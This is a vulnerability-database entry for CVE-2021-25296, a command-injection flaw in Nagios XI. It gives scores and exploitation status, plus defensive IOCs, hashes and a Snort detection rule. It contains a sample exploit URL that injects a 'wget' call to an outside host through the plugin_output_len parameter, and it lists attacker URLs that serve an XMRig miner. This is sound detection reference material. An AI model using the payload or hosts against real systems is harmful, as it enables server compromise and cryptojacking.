cbcvebase.
CVE-2021-25296
published 2021-02-15

CVE-2021-25296: Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file…

PriorityP192high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-02-01
Exploited in the wild
EPSS
71.74%
99.3th percentile
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.

Affected

1 ranges
VendorProductVersion rangeFixed in
nagiosnagios_xi5.5.6 – 5.7.5

Detection & IOCsextracted from sources · hover to see the quote

ip118.107.43.174
urlhttp://118.107.43.174/upload/files/xmrig
urlhttp://118.107.43.174/upload/files/config.json
urlhttp://118.107.43.174/upload/files/run.sh
urlhttp://118.107.43.174/upload/files/xmrig.tar.gz
hash54b45e93cee8f08a97b86afa78a78bc070b6167dcc6cdc735bd167af076cb5b3
hash2c923d8b553bde8ce3167fe83f35a40a712e2bed2b76ebaf5e3e63642d551389
hashc711bb6cf918b1f140f4162daab37844656eba2e16c25c429606e4c69c990f99
hash4079b3b34caa86dce0edc923a3292f5814dd555f28e8e6ec4c879a2c50a80787
path/usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php
path/usr/lib/dev
path/tmp/usr/lib
filenameworkrun.sh
filenamesystemd-udevd.sh
filenamesystemd-udevd-run.sh
filenamesystemd-run.py
filenamesystemd-py-run.sh
filenamexmrig.tar.gz
url/nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"plugin_output_len="; pcre:"/^[0-9]{1,10}\x3b/R"; reference:cve,2021-25296; classtype:attempted-admin; sid:2034992; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit targets GET /nagiosxi/config/monitoringwizard.php with wizard=windowswmi and a semicolon-injected plugin_output_len parameter (e.g., plugin_output_len=9999;<command>). Monitor for numeric value followed immediately by %3b or literal semicolon in that parameter.
  • Hunt for running processes matching systemd-py-run.sh, systemd-run.py, systemd-udevd-run.sh, systemd-udevd.sh, workrun.sh, or systemd-dev as indicators of XMRig deployment post-exploitation.
  • Check for presence of dropper/persistence scripts in /usr/lib/dev and /tmp/usr/lib as post-exploitation artifacts.
  • Palo Alto Threat Prevention signature 90873 covers this exploit; use as a reference SID for tuning equivalent IDS/IPS rules.
  • Emergingthreats Snort/Suricata SID 2034992 directly detects CVE-2021-25296 exploitation attempts against nagiosxi/config/monitoringwizard.php with a semicolon-injected plugin_output_len value.
  • ·Exploitation requires valid Nagios XI credentials; this is an authenticated RCE, not unauthenticated. Detection rules should account for the authenticated session flow (login → obtain nsp token → exploit request).
  • ·The vulnerable backend file /html/config/monitoringwizard.php is encrypted with SG11; analysis must be performed on the include file windowswmi.inc.php instead.
  • ·The same Metasploit module also covers CVE-2021-25297 (switch wizard) and CVE-2021-25298 (cloud-vm wizard); detections scoped only to windowswmi will miss those related exploitation paths.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.